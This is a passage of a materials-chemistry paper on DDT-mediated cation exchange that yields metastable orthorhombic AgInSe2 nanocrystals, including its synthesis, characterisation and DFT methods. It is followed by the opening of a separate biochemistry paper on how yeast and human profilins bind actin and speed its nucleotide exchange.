The formation of orthorhombic AgInSe2 nanocrystals in the presence of DDT suggests that DDT changes the mechanism of formation for the ternary material. To better understand the mechanism of formation of orthorhombic AgInSe2 nanocrystals when DDT is present, we performed additional aliquot studies with a hotinjection of the Bn2Se2 as the selenium precursor. In contrast to the long-lived binary Ag2Se intermediates observed in the aliquot study with no DDT (Figure 2a), the analogous aliquot study in the presence of DDT reveals fast conversion of precursors to the metastable orthorhombic AgInSe2 product (Figure 2b). The amount of DDT was reduced from the 20 equivalents (relative to the metal precursors) used in the original synthesis to 5 equivalents in order to better observe any binary Ag2Se intermediates (Figure 2c). Above this threshold value, conversion happened so quickly that no binary intermediates were observed preceding the formation of orthorhombic AgInSe2. Notably, Figure 2c illustrates how when DDT is present, the predominate intermediate observed is the orthorhombic phase of Ag2Se, and not the complex mixture of silver selenides that was observed in the absence of DDT, indicating that orthorhombic Ag2Se is the intermediate that leads to orthorhombic AgInSe2. This fast conversion of orthorhombic Ag2Se elucidates the role of DDT in the reaction; as a soft base, it is capable of mediating cation exchange from the orthorhombic Ag2Se phase that is otherwise kinetically sluggish to react in the presence of soft In 3+ cations due to the low intrinsic ionic conductivity of orthorhombic Ag2Se (~10 -4 S/cm). 44 While others [38][39][40] have observed the presence of orthorhombic Ag2Se prior to the formation of orthorhombic AgInSe2, this transformation is not well understood in the literature. Abazović et al. speculated that the formation of the metastable phase of AgInSe2 is in some way related to how ligands bind to the surfaces of the ternary nanocrystal nuclei, thus directing the phase towards orthorhombic AgInSe2. 38 We propose a more nuanced mechanism of formation for orthorhombic AgInSe2 whereby a DDT-mediated topotactic cation exchange converts orthorhombic Ag2Se to orthorhombic AgInSe2.
Structural comparisons of orthorhombic Ag2Se to orthorhombic AgInSe2 reveal similarities between these two crystal structures and elucidate how the process of cation exchange transforms the former into the latter. Upon examining the Se 2sub-lattice of orthorhombic Ag2Se, it is apparent that there exists a nearly hexagonally close-packed network of Se 2anions in the [010] direction (Figure 3a). These hexagonal sheets of Se 2are nearly planar, although the in-plane Se-Se angles are distorted from the 120° inplane angles within the hexagonal lattice of orthorhombic AgInSe2 (Figure 3a, b). The interplanar d-spacing between Se 2sheets along the [010] direction in orthorhombic Ag2Se is 3.56 Å, whereas the d-spacing along the [001] direction of close packing in AgInSe2 is slightly less, at 3.51 Å. Moreover, the average Se-Se distance within a hexagonal sheet of Se is 4.53 Å for orthorhombic Ag2Se and 4.24 Å for orthorhombic AgInSe2. Topotactic cation exchange from orthorhombic Ag2Se to orthorhombic AgInSe2 should naturally allow for this slight lattice contraction, considering the ionic radius of four-coordinate Ag + is 129 pm and that of four-coordinate In 3+ is 94 pm. Overall, the Se 2sub-lattice of orthorhombic Ag2Se resembles that of AgInSe2, since only slight changes are needed to take the former to the latter.
Considering that the Se 2sub-lattices are so similar, the redistribution of cations upon cation exchange with In 3+ comprises a more significant structural transformation in going from orthorhombic Ag2Se to orthorhombic AgInSe2. The asymmetric unit of orthorhombic Ag2Se has one crystallographically unique Se 2site and two unique Ag + sites. 43,45 Of the two Ag + sites, one site resides within a tetrahedral hole. These tetrahedra share edges with two adjacent, symmetrically equivalent tetrahedra along the [100] direction. The other Ag + site exists in a trigonal planar coordination geometry (Figure 3d). The orthorhombic structure of AgInSe2 is a wurtzite-like structure in that the Se 2sub-lattice is hexagonally close-packed and all cations reside in corner-sharing tetrahedral coordination environments. Thus, to form this structure from orthorhombic Ag2Se, cation exchange needs to occur in a manner that disrupts the edgesharing and trigonal planar coordination geometries to yield the requisite corner-sharing tetrahedron motif. To achieve such a transformation, the periodic tetrahedral holes that exist within the structure of orthorhombic Ag2Se (Figure 3c, e) need to be filled by either incoming In 3+ ions or by neighboring Ag + ions that, when migrating, would then leave corner-sharing tetrahedral holes that In 3+ could fill. Figure 3e demonstrates how removing the edge-sharing tetrahedra and trigonal planar coordination environments from the orthorhombic Ag2Se structure, and placing cations within the periodic tetrahedral holes, leads to the wurtzite-like structure of orthorhombic AgInSe2. Occupation of the tetrahedral holes in orthorhombic Ag2Se would lead to unstable, edge-sharing configurations with both the proximal Ag + tetrahedra and trigonal planar sites (Figure 3c). Every In 3+ ion incorporated into the structure necessarily must expel three Ag + ions to maintain charge neutrality. Therefore, it is useful to visualize a transformation wherein each In 3+ atom displaces one Ag + atom from a neighboring tetrahedral coordination site and two Ag + atoms from trigonal planar coordination sites, creating more stable corner-sharing configurations via the displacement of edge-sharing motifs within the structure. While the mechanism described above illustrates how the cornersharing network of tetrahedra in orthorhombic AgInSe2 can be derived from orthorhombic Ag2Se, it does not explicitly explain how or why the specific ordering of cations in orthorhombic AgInSe2 arises through this transformation. In fact, the tetrahedral holes within orthorhombic Ag2Se are periodic such that along the [100] direction, they form a linear channel of vacancies (Figure 4a). If all In 3+ cations were to occupy these vacancies, the resulting ternary structure would contain linear chains of Ag + and In 3+ in the [010] direction, where the cations within each chain would be identical (Figure 4d). However, this arrangement of cations is not present within the orthorhombic structure of AgInSe2, rather, the cationic sites along the [010] direction alternate between Ag + and In 3+ (Figure 4b). This indicates that an ion hopping process is operative during cation exchange such that Ag + ions migrate to accommodate incoming In 3+ . By comparing the calculated electrostatic site potentials and Madelung energy of the orthorhombic AgInSe2 structure to the site potentials and Madelung energy of the structure that would result by simply filling the periodic holes within orthorhombic Ag2Se, we found that there is an electrostatic driving force that causes this shuffling of Ag + during cation exchange; in the theoretical ternary structure, derived directly from orthorhombic Ag2Se with no ion hopping, the calculated In 3+ site potential is greater (-1.54 e/Å) than that for the In 3+ site in orthorhombic AgInSe2 (-1.67 e/Å), which is an indication that electrostatic repulsion between neighboring In 3+ ions is more significant in this theoretical arrangement than in the orthorhombic structure of AgInSe2. This finding is also supported by the Madelung energy calculations, which represents the attractive electrostatic component to the lattice energy of an ionic solid. 46 The Madelung energy of the theoretical ternary structure is higher in energy (-7.38 MJ/mol) than that of the experimentally observed orthorhombic AgInSe2 structure (-7.60 MJ/mol; see SI for calculation details).
The Materials Project database contains thermodynamic information calculated on six polymorphs on AgInSe2, two of which are experimentally known (!4 # 2%, '3 # )), and four of which are theoretical structures (R3m, I41/amd, Fdd2, P4/mmm) calculated by DFT. Of these, the tetragonal !4 # 2% polymorph is predicted to be stable, with the trigonal '3 # ) polymorph exhibiting a degree of metastability at 0.1 eV/atom above the 0 K convex hull ( Figure S8). Typically, materials with a predicted metastability in the range of ~0.1 eV/atom are considered in principle synthesizable under appropriate conditions, although this is highly dependent on chemical composition. 47 To supplement these calculations, an additional calculation was performed on the orthorhombic Pna21 polymorph of AgInSe2. The Pna21 polymorph was found to have a formation energy of -0.412 eV/atom, which is 10 meV/atom above the predicted stable chalcopyrite phase of AgInSe2. Figure S8 combines this result with existing Materials Project data calculated using the phase diagram analysis capability of the pymatgen package. 48 This low lying metastability is not unprecedented; in fact, many metastable metal selenide materials are less than 25 meV/atom above the thermodynamic ground state, and the median energy above the ground state for metastable ternary polymorphs irrespective of composition is 6.9 meV/atom. 5 Thus, while the orthorhombic structure is metastable, it is only higher in energy than the chalcopyrite structure by a small margin, which may explain why it is isolable.
Predicting the Syntheses of Novel Metastable Polymorphs on the Nanoscale. Predictable syntheses of metastable materials at large remain a challenge. From this work, and our previous work on phase control of CuInSe2 nanocrystals, 24 we note an interesting pattern emerging. In both cases, the metastable ternary chalcogenide nanocrystals form via cation exchange from low-temperature structures of binary selenides, which are metastable at the relatively high temperatures of their respective nanocrystal syntheses. The highlighted areas indicate the type of Se 2sub-lattice present for each respective phase (blue = pseudo-hcp, red = bcc, white = fcc). Notably, there exist lattice mismatches in going from either phase of Ag2Se to chalcopyrite AgInSe2. Such lattice mismatches can be taken advantage of by leveraging fast cation exchange kinetics on the nanoscale to generate novel metastable ternary structures. (b) Reaction scheme explaining isolation of metastable AgInSe2; the orthorhombic phase of AgInSe2 is only 10 meV/atom in energy higher than the chalcopyrite phase and has a Se 2sublattice analogous to that of Ag2Se, allowing for fast, DDT-mediated conversion to the ternary metastable phase.
Notably, for both copper and silver selenides, the low-temperature (Cu3Se2 and orthorhombic Ag2Se) and high-temperature (Cu2-xSe and cubic Ag2Se) phases differ significantly in their Se 2sub-lattices, with the low-temperature phases of each being pseudohexagonal and the high-temperature phases assuming face-centered and body-centered cubic Se 2sub-lattices, respectively. As mentioned above, the chalcopyrite structure type possesses a face-centered cubic Se 2sub-lattice. Therefore, isolating metastable ternaries in these cases relies on the conversion of binary selenides that possess Se 2sub-lattices that do not form in bulk for the ternary materials. In the formation of both metastable polymorphs of AgInSe2 and CuInSe2, kinetically fast topotactic cation exchange mechanisms provide the means of preserving the distinct hexagonal Se 2sub-lattices upon reaction within In 3+ . These mechanisms outcompete processes that would otherwise lead to the thermodynamically preferred crystal structures, and instead lead to metastable ternary structures that do not exist on their respective bulk phase diagrams for the ternary selenides.
More generally, a promising area to explore in the rational discovery of new metastable nanomaterials may be within material systems that exhibit sub-lattice mismatches between the binary and ternary anionic sub-lattices, where the binary polymorphs with distinct anionic sub-lattices could generate new metastable ternary structures by reacting with a third element in such a way that the anionic sub-lattice is preserved. In effect, lattice mismatches between anionic sub-lattices can act as effective kinetic barriers that restrict quick access to thermodynamic structures, allowing for the isolation of metastable polymorphs on the nanoscale, exemplified by Figure 5. Inspecting pseudo-binary phase diagrams for ternary material systems, and the phase diagrams of the binaries that could lead to ternary materials, is insightful and can act as a guide when searching for lattice mismatches to exploit for new metastable nanomaterial syntheses.
To check that this conceptual framework holds true for more than just CuInSe2 and AgInSe2, we inspected the pseudo-binary phase diagram of the Cu2Se-SnSe2 system; here, with increasing Sn 4+ content, cubic Cu2Se (66.7 % Cu, 33.3 % Se, stable above ~130 °C) converts to a cubic, sphalerite phase of Cu2SnSe3. 49 However, the low-temperature Cu3Se2 phase (60 % Cu, 40 % Se) has a pseudo-hexagonal anionic sub-lattice 24 and it maintains a Cu:Se ratio within the boundaries of the two-phase Cu2Se-SnSe2 region. Therefore, we expect a kinetically fast reaction of Cu3Se2 with Sn 4+ to produce a metastable, hexagonal phase of Cu2SnSe3 since there exists a sub-lattice mismatch in going from Cu3Se2 to the thermodynamically preferred sphalerite phase of Cu2SnSe3. Indeed, such a metastable hexagonal phase exists that was previously unknown in bulk, as we first reported the isolation of wurtzite-like Cu2SnSe3 nanocrystals in 2012. 50 This further illustrates the utility of leveraging sub-lattice mismatches to generate novel metastable materials.
We hypothesize that this conceptual framework can also be extended to the predictable isolation of metastable phases not present on bulk phase diagrams for quaternary materials. To support this hypothesis, we turned to the Cu2ZnSnS4 literature. Cu2ZnSnS4 is a quaternary material that possesses a face-centered cubic anionic sub-lattice and crystallizes with a kesterite structure type, 51,52 analogous to the diamondoid chalcopyrite structure type for ternary materials. The quasi-ternary Cu2S-ZnS-SnS2 phase diagram shows that, in bulk, the introduction of ZnS and SnS2 into Cu2S results in the conversion of a Cu2S polymorph (digenite, a high-temperature phase stable up to 1130 °C) with a face-centered cubic anionic sublattice to kesterite Cu2ZnSnS4. 53,54 However, wurtzite-like Cu2ZnSnS4 nanocrystals have been synthesized, 55,56 despite the fact that this phase does not exist in bulk. Phenomenologically, this wurtzite-like phase must be the result of kinetically fast reactions with a low-temperature phase of Cu2-xS (such as djurelite or roxbyite) 23,54 that does not possess an fcc anionic sub-lattice. Thus, the predictive power of this conceptual framework can be proven by using it to explain empirically discovered metastable ternary and quaternary nanomaterials. In summary, coupling the identification of material systems that exhibit lattice mismatches between potential kinetic intermediates and the thermodynamically expected products with computations that reveal the energetics of the predicted metastable phases could provide a useful new methodology for the rational discovery of metastable nanomaterials that have never been observed before on bulk phase diagrams.
CONCLUSIONS
In conclusion, this work sheds light on the mechanism of phase determination in AgInSe2 nanocrystals. More specifically, DDT mediates a fast cation exchange from orthorhombic Ag2Se to form a metastable phase of orthorhombic AgInSe2. Without the use of DDT as an exchange mediator, this orthorhombic Ag2Se intermediate cannot undergo cation exchange due to its low intrinsic ionic mobility. For reactions that occur in the absence of DDT, various silver selenide intermediates form and then convert to the thermodynamic chalcopyrite structure of AgInSe2 via kinetically slow non-topotactic cation exchange processes. In addition to elucidating the mechanism of formation for the metastable orthorhombic phase of AgInSe2, we discovered that its isolation likely also correlates with the fact that it is only marginally metastable at 10 meV/atom above the ground state. Finally, we provide a new conceptual framework to predict metastable polymorphs that do not form in bulk; using phase diagrams, it is possible to identify sublattice mismatches that exist between kinetic intermediates that form quickly in nanocrystal syntheses and the thermodynamically most stable polymorphs for multinary materials. Fast conversion of intermediates with distinct sub-lattices can generate new metastable structures of multinary nanomaterials not present on bulk phase diagrams. In predicting these new phases, convex hull calculations can provide an idea of whether or not such metastable materials should be isolable from a thermodynamic perspective.
EXPERIMENTAL SECTION
Materials and General Procedures. Silver(I) nitrate (AgNO3, Alfa Aesar, 99.9%), indium(III) acetate (In(OAc)3, Alfa Aesar, 99.99%), dibenzyl diselenide (Bn2Se2, Alfa Aesar, 95%), 1-dodecanethiol (DDT, Alfa Aesar, 98%), 1-octadecene (ODE, Sigma-Aldrich, 90%), oleic acid (Alfa Aesar, 90%), and selenium powder ~200 mesh (Alfa Aesar, 99.999%) were all used as received, with no further purification. All solvents were degassed prior to use for 4 h at 105 °C and then overnight at room temperature. Reactions were conducted under a nitrogen atmosphere using standard Schlenk techniques. All reactions employed J-KEM temperature controllers with in-situ thermocouples in order to control and monitor the temperature of the reaction vessel. Synthesis of AgInSe2 Nanocrystals. We adapted the general synthesis of AgInSe2 nanocrystals from Deng et al, 28 but here using a diselenide precursor. In a typical synthesis, AgNO3 (16.9 mg, 0.1 mmol) and In(OAc)3 (29.1 mg, 0.1 mmol) were loaded into a 25 mL three-neck round-bottom flask. Bn2Se2 (34.0 mg, 0.1 mmol) was added to a separate two-neck round-bottom flask. In the syntheses of orthorhombic AgInSe2 nanocrystals, 4 mL of ODE, 0.5 mL of DDT, and 50 µL of oleic acid were added to the three-neck flask and 0.5 mL of ODE and 0.5 mL of DDT were added to the two-neck flask. In the syntheses of chalcopyrite AgInSe2 nanocrystals, all DDT was replaced with an equal volume of oleic acid, keeping the volumes of ODE constant. After adding the solvents, the flasks were degassed at 100 °C for 1 h. The metal precursorcontaining flask was then ramped to 250 °C at 10 °C/min under nitrogen. Upon reaching a high temperature (200 °C for DDTcontaining reactions and 230 °C for reactions not containing DDT), the Bn2Se2 solution was injected into the metal precursor-containing flask, resulting in nucleation of nanocrystals (the relatively low 200 °C injection temperature for DDT-containing reactions was implemented to prevent formation of sulfides prior to injection of the diselenide). Following injection, the three-neck flask recovered to 250 °C and was allowed to heat for a total of 30 min after injection. The three-neck flask was then quenched by placing it in a room temperature water bath. The crude product was then split into two 40 mL centrifuge tubes and filled to volume with ethanol. The centrifuge tubes were bath sonicated for 10 min, and centrifuged for 3 min. The product was redispersed in 5 mL of hexanes in each centrifuge tube and filled to volume with ethanol. This washing procedure was repeated two more times to yield particles for XRD analysis. Aliquot Studies. All aliquot studies were performed using the same experimental protocols described for the synthesis of AgInSe2 nanocrystals; however, to capture the various intermediates that precede AgInSe2 formation, the final reaction temperatures (and amount of DDT in the case of orthorhombic AgInSe2) were reduced from 250 °C for the initial syntheses to 230 °C. In the case of orthorhombic AgInSe2, this reduction in temperature was still not enough to capture the timescale of formation of the ternary phase. To observe the binary orthorhombic Ag2Se intermediate, the amount of DDT for the aliquot study was reduced from 20 equivalents with respect to the metal precursors to 5 equivalents. Under these conditions, we were able to observe the binary intermediate. Characterization. Powder X-ray diffraction (XRD) measurements were performed on a Rigaku Ultima IV powder X-ray diffractometer using Cu Kα radiation (λ = 1.5406 Å). Samples were analyzed on a zero-diffraction silicon substrate. Transmission electron microscopy (TEM) micrographs were obtained from dropcast samples supported on holey carbon-coated copper TEM grids (Ted Pella, Inc.). Grids were placed in a vacuum oven overnight at 60 °C for removal of volatile organics. A JEOL JEM-2100 microscope with a Gatan Orius charge-coupled device (CCD) camera was used to take TEM images at an operating voltage of 200 kV. Thermogravimetric analysis (TGA) was performed on a TGA Q50 instrument with a heating rate of 10 °C/min with an approximate sample size of 10 mg in an alumina crucible. Density Functional Theory (DFT). Formation energy calculations were performed on the orthorhombic Pna21 polymorph using the Vienna Ab-initio Simulation Package (VASP), plane-augmented wave pseudopotentials and a k-point density of 64 points per Å -3 , consistent with Materials Project standard settings to ensure the energies would be directly comparable to existing Materials Project calculations. 57,58 The atomic positions and crystal lattice were allowed to relax, resulting in lattice parameters of a = 7.48 Å, b = 8.76 Å and c =7.14 Å. These calculations were performed using the PBE exchange-correlation functional, and so lattice parameters are expected to be slightly over-estimated compared to experiment.
Supporting Information
The Supporting Information is available free of charge on the ACS Publications website.
Additional figures including simulated and experimental XRD patterns; TGA traces; control aliquot studies; Se 2sub-lattice illustrations; Rietveld refinements and parameters; Madelung constant and site potential calculation details (PDF) Note that the Pna21 structure can be distinguished by unique reflections at 15-16° 2θ from the (110) and (011) lattice plane families, which are absent in a higher symmetry wurtzite structure type. The inset illustrates an experimental powder XRD pattern of the as-synthesized orthorhombic AgInSe2 nanocrystals; the minor reflections at 15-16° 2θ are observed, confirming that these nanocrystals crystallize in the Pna21 space group. Figure S2. (a) Annealing powders of the as-prepared orthorhombic AgInSe2 nanocrystals to 300 °C does not cause the material to thermally relax to the thermodynamically preferred chalcopyrite structure by XRD, even after several heating-cooling cycles, indicating that there is a barrier to a phase transition to the chalcopyrite phase. Note, however, that at these temperatures some of the Ag + is reduced to Ag. Powder XRD of the material taken from the TGA crucible after heating to 450 °C shows that the reduction of Ag + to Ag is more pronounced at higher temperatures, but that the orthorhombic phase also still persists. Notably, this progression of XRD patterns was taken from a material that had been left on the lab bench for 10 months. (b) Heating assynthesized orthorhombic AgInSe2 nanocrystals in 1-octadecene at 300 °C for 1 h shows that the orthorhombic phase is still predominant, although XRD indicates some conversion of orthorhombic to chalcopyrite AgInSe2. Figure S3. (a) TGA trace of orthorhombic AgInSe2 up to 300 °C; the material shows minimal mass loss at this temperature. (b) TGA trace of orthorhombic AgInSe2 up to 450 °C; here, a much larger mass loss is evident, as the surface ligands are stripped from the nanocrystal surface at this temperature. It is possible that ligand loss from the nanocrystal surface correlates with the observed reduction of Ag + to Ag shown in Figure S2. Figure S4. (a) Powder XRD pattern of orthorhombic AgInSe2 that forms when only DDT and ODE are included in the reaction, indicating that oleic acid is not important in the isolation of the metastable phase. (b) When DDT is replaced by an equal amount of oleic acid in the solvent mixture, chalcopyrite AgInSe2 forms with some Ag2Se impurities by powder XRD, indicating DDT is important in phase determination. Figure S5. Powder XRD aliquot studies of a reaction in which Bn2Se2 was hot-injected into a flask containing a solution of only AgNO3 (with no In(OAc)3 present). A complex mixture of Ag2Se polymorphs results. Although cubic Ag2Se is the thermodynamically stable polymorph at the reaction temperatures, no significant phase transitions were observed over the time scale of the reaction, indicating that the other phases of Ag2Se present are kinetically resistant towards a phase transition to cubic Ag2Se under these conditions. Figure S6. (a) Se 2sub-lattice of chalcopyrite AgInSe2; note that the lattice is fcc as it contains an ABC packing motif. (b) Se 2sub-lattice of cubic Ag2Se; this lattice is body-centered cubic. Figure S7. Hot-injection reactions (highlighted with yellow background) that were allowed to react for longer times in the presence of excess In 3+ (the initial reactions were performed with 1:1 In:Ag ratios) did not produce phase-pure AgInSe2 by power XRD. Heating-up reactions (highlighted with blue background) showed better conversion to chalcopyrite AgInSe2 in the presence of excess In 3+ , with the 3 h reaction producing nearly phase-pure chalcopyrite AgInSe2 as shown by a Rietveld refinement of powder XRD data in (b). All heating-up reactions were performed at 250 °C. Figure S8. (a) The 0 K phase diagram of the Ag-In-Se chemical system, color coded by calculated formation energy. (b) The relative ordering of AgInSe2 polymorphs, as predicted by calculation.
Electrostatic site potential and Madelung energy calculations:
The orthorhombic AgInSe2 CIF served as a template to create the CIF of the theoretical structure that would result if the vacancies in the orthorhombic Ag2Se structure were directly filled by In 3+ (we derived the CIF of orthorhombic AgInSe2 itself from a CIF of the isostructural AgInS2, corrected for lattice parameters, unit cell volume and composition. The collection code for the AgInS2 CIF in the ICSD is 51618). Because the space group of this theoretical structure was not known, the space group was defined as P1 in the CIF and the Cartesian coordinates of each atom in the structure were explicitly defined.
The VESTA software allows users to calculate electrostatic site potentials and Madelung energies based on user inputs. 1 For all calculations, user inputs for radius = 1 Å and for region = 4 Å -1 . The output for Madelung energy calculations is in terms of energy per mole of asymmetric units; because the CIF of the theoretical structure explicitly defined the coordinates of each atom without the use of symmetry operators, the asymmetric unit was the entire unit cell. The unit cell is formally Ag4In4Se8, so to get the Madelung energy on a per mole basis, the final output was divided by four. | 2019-12-16T22:53:22.818Z | 2019-12-13T00:00:00.000 | {
"year": 2020,
"sha1": "770d09659a4eb1ea3a9b261442236703b41d1666",
"oa_license": "CCBYNC",
"oa_url": "https://figshare.com/articles/journal_contribution/Ligand-Mediated_Phase_Control_in_Colloidal_AgInSe_sub_2_sub_Nanocrystals/12059256/1/files/22166589.pdf",
"oa_status": "GREEN",
"pdf_src": "Adhoc",
"pdf_hash": "b0795efd63c7b883122d824a544e32f6839b236b",
"s2fieldsofstudy": [
"Materials Science",
"Chemistry"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
6685230 | pes2o/s2orc | v3-fos-license | Control of the Ability of Profilin to Bind and Facilitate Nucleotide Exchange from G-actin*
A major factor in profilin regulation of actin cytoskeletal dynamics is its facilitation of G-actin nucleotide exchange. However, the mechanism of this facilitation is unknown. We studied the interaction of yeast (YPF) and human profilin 1 (HPF1) with yeast and mammalian skeletal muscle actins. Homologous pairs (YPF and yeast actin, HPF1 and muscle actin) bound more tightly to one another than heterologous pairs. However, with saturating profilin, HPF1 caused a faster etheno-ATP exchange with both yeast and muscle actins than did YPF. Based on the -fold change in ATP exchange rate/Kd, however, the homologous pairs are more efficient than the heterologous pairs. Thus, strength of binding of profilin to actin and nucleotide exchange rate are not tightly coupled. Actin/HPF interactions were entropically driven, whereas YPF interactions were enthalpically driven. Hybrid yeast actins containing subdomain 1 (sub1) or subdomain 1 and 2 (sub12) muscle actin residues bound more weakly to YPF than did yeast actin (Kd = 2 μm versus 0.6 μm). These hybrids bound even more weakly to HPF than did yeast actin (Kd = 5 μm versus 3.2 μm). sub1/YPF interactions were entropically driven, whereas the sub12/YPF binding was enthalpically driven. Compared with WT yeast actin, YPF binding to sub1 occurred with a 5 times faster koff and a 2 times faster kon. sub12 bound with a 3 times faster koff and a 1.5 times slower kon. Profilin controls the energetics of its interaction with nonhybrid actin, but interactions between actin subdomains 1 and 2 affect the topography of the profilin binding site.
The interaction of actin with the small protein profilin is central to the regulation of actin filament dynamics within the cell. Profilin was first identified as a protein that bound to G-actin and, through sequestration of actin monomers, inhibited filament formation (1,2). The majority of subsequent work demonstrated that profilin exhibited a preference for ATP versus ADP actin and catalyzed the exchange of actin-bound adenine nucleotide (3)(4)(5). However, a few studies have disputed this nucleotide preference (6,7). Later work showed that profilin could also work with the actin filament nucleator, formin, to promote filament elongation by delivering actin monomers to the growing end of the formin-capped filament (8 -10).
The ability of profilin to preferentially sequester ATP G-actin and to facilitate adenine nucleotide exchange from the actin is important, considering the role that an actin-dependent ATP hydrolysis cycle plays in actin dynamics. G-actin is a poor ATPase whose activity is stimulated by polymerization. Subsequent discharge of the P i from ADP-P i F-actin occurs at different rates, depending on the particular actin isoform involved, and results in the generation of ADP-F-actin (11,12). In terms of filament stability, ATP and ADP-P i actin are more stable than ADP-F-actin (13). After release of ADP-monomers from the end of the actin filament, the ADP exchanges for ATP, and the polymerization cycle starts again. Profilin may have a role in facilitating this exchange and thereby help to regulate the dynamics of actin filament formation (13). However, the necessity for this rate enhancement may not be universally applicable. For example, plant profilin does not catalyze nucleotide exchange from actin (14). However, it can complement a profilin-deficient strain of Dictyostelium discoideum with little if any loss of normal cell behavior (15).
Although profilin generally is not thought of as an enzyme, it actually acts as one in its facilitation of the actin nucleotide exchange reaction. It must first reversibly bind to the actin and then cause a conformational change that results in enhanced rates of release of the bound adenine nucleotide. Initial studies revealed that the extent of the enhancement is highly dependent on the type of profilin used. For example, under saturating conditions, with muscle actin, mammalian profilin enhances the rate of exchange 30 -1000-fold (16), yeast profilin enhances it 3-fold (17), and profilin from the plant Arabidopsis shows no enhancement of exchange rate (14).
Initial studies also suggest that the nature of the binding of profilin to actin seems to depend on both the profilin and the actin involved. For example, human platelet profilin binds muscle actin about 50-fold more tightly than it binds yeast actin (17). The energetics that defines the actin-profilin interaction can be very different depending on the particular actin-profilin pair involved. Based on incomplete data obtained so far, change in enthalpy seems to control the interaction of yeast profilin with muscle actin, whereas change in entropy seems to drive the interaction of human profilin with muscle actin (17). Whether this difference applies only to these two actin-profilin pairs or is more general is not known. Insight into the molecular basis of the profilin-actin interaction came from the crystallographic studies of the profilin-actin complex carried out by Schutt and co-workers (18,19). Profilin binds to actin across actin subdomains 1 and 3 at the barbed end of the actin monomer, and this interaction seems to result in an opening of the cleft separating the two domains of the actin molecule in which the ATP resides. This opening occurs by a pivoting motion of the two domains around a hinge region involving a helix containing residues 137-144 in the bridge between subdomains 1 and 3 (20). However, the manner in which this movement is brought about is not understood.
To gain more insight into the mechanism governing the profilin-dependent acceleration of the release of actin-bound nucleotide, we have carried out a detailed study of both the binding and exchange reactions involving the interaction of both yeast and human profilins with both muscle and yeast actins. We were especially interested in the yeast/muscle actin comparison, because yeast actin inherently exchanges its nucleotide 30 times faster than does muscle actin despite the 87% homology between the two proteins (17,21). We also present work with a hybrid actin we have constructed in which subdomains 1 and 2 are from muscle actin and subdomains 3 and 4 are from yeast actin to better understand the relative importance of subdomains 1 and 3 in its interaction with profilin.
MATERIALS AND METHODS
Protein Preparations-Yeast hybrid and H372R mutant actins were generated as described previously (22,23). Yeast wild type (WT) 2 and mutant actins were purified by a combination of DNase I affinity chromatography and DEAE-cellulose chromatography as described by Cook et al. (24). Globular actins (G-actins) were stored in G buffer (10 mM Tris-HCl, pH 7.5, 0.2 mM CaCl 2 , 0.2 mM ATP, and 0.1 mM dithiothreitol) at 4°C and used within 5 days. The yeast profilin and human profilin I Escherichia coli expression plasmids were kindly provided by S. Almo (Albert Einstein College of Medicine) and D. Schafer (University of Virginia), respectively. The mutant human profilin I molecules were engineered using the QuikChange sitedirected mutagenesis kit from Stratagene (La Jolla, CA). All profilins were expressed by E. coli BL21 and purified with a procedure similar to that described by Eads et al. (17) with modifications. Briefly, the cells expressing the profilin were lysed by sonication in the presence of 1 unit/l rLysozyme TM (Novagen, San Diego, CA) and 50 g/ml DNase I (Worthington). The profilin in the cell supernatant obtained by centrifugation of the cell lysate was further purified by polyproline affinity chromatography and Q Sepharose fast flow chromatography. SDS-PAGE of the final material on 15% acrylamide gels revealed a single band. The concentration of either yeast profilin or human profilin was determined spectrophotometrically using an ⑀ 280 of 20,300 and 10,800 M Ϫ1 cm Ϫ1 , respectively (17). Purified profilins were stored at 4°C.
Etheno-ATP (⑀ATP)-bound Actin Preparation and Actin
Binding Assay-⑀ATP-bound G-actin was prepared as described by Wen (25) with modifications. Briefly, the free nucleotide was removed from G-actin stock solutions by centrifugation through Zeba Desalting Spin Columns (Pierce) preequilibrated with G 0 buffer (10 mM Tris-HCl, pH 7.5, 0.4 mM CaCl 2 , and 1 mM dithiothreitol) at 4°C as described by the manufacturer's protocol. A 20 M G-actin solution in ATP-free G-buffer was incubated with ⑀ATP (Invitrogen) at a final con-centration of 1 mM at 4°C overnight. Unbound nucleotide was removed by desalting as above in the presence of 0.4 mM CaCl 2 , which was present throughout the remainder of the procedure. Thus, following the final desalting, the solution containing the 20 mM nucleotide-G-actin complex was in the presence of 0.4 mM CaCl 2 . Profilin at various concentrations was mixed at 25°C in G 0 buffer with 1 M ⑀ATP G-actin to a final volume of 1.5 ml. Free ATP was added to the reaction mixture to a final concentration of 250 M with constant stirring. Thus, at this time, for all experiments, the free Ca 2ϩ was ϳ150 mM for all reactions tested.
The decrease in fluorescence due to the disassociation of actin-bound ⑀ATP was monitored over time with a Fluorolog-3 instrument containing a thermostatted sample holder (Spex, Edison, NJ) at an excitation wavelength of 340 nm and an emission wavelength of 410 nm. The net fluorescence change was determined at each time point and normalized against the total fluorescence change at the end of the exchange. The actinbound ⑀ATP disassociation rate of each experiment was obtained by fitting each individual normalized data set to a single-exponential function by using Excel software (Microsoft).
For assessing the effects of profilin on the nucleotide exchange rate, the data at different profilin concentrations were analyzed by Excel and fitted to Equation 1, where k obs is the observed disassociation rate constant, k a is the disassociation rate constant of G-actin in the absence of profilin, k pa is the theoretical disassociation rate constant of the profilin-G-actin complex, [A] T is the concentration of total actin, [A] is the concentration of free G-actin, [P] is the concentration of free profilin, and K d is the dissociation equilibrium constant of the complex. To obtain the best fit, k pa was subjected to the constraint that it is larger than k a . Isothermal Titration Calorimetry (ITC)-ITC measurements were performed using a VP-ITC calorimeter (MicroCal, Northampton, MA). The concentrations of the profilin and actin were measured by UV absorption at 280 or 290 nm as described above, and the proteins were degassed before each experiment. Titrations were performed in 20 mM PIPES, pH 7.5, 0.2 mM ATP, 0.2 mM CaCl 2 , and 1 mM dithiothreitol. The concentrations of profilin and the actin mutants varied among experiments, and all interactions were repeated two times. Heats of dilution were calculated by averaging the last 3-5 injections and then were subtracted from the raw data. The data sets were then analyzed individually using a single-site binding model from the ORIGIN ITC analysis software package provided by the VP-ITC calorimeter manufacturer. In this analysis, the values for stoichiometry (n), change in enthalpy (⌬H), and the affinity constant (K a ) were fit using nonlinear least squares analysis. The reported values for n, ⌬H, and K a are the average and S.D. of all injections for an individual interaction.
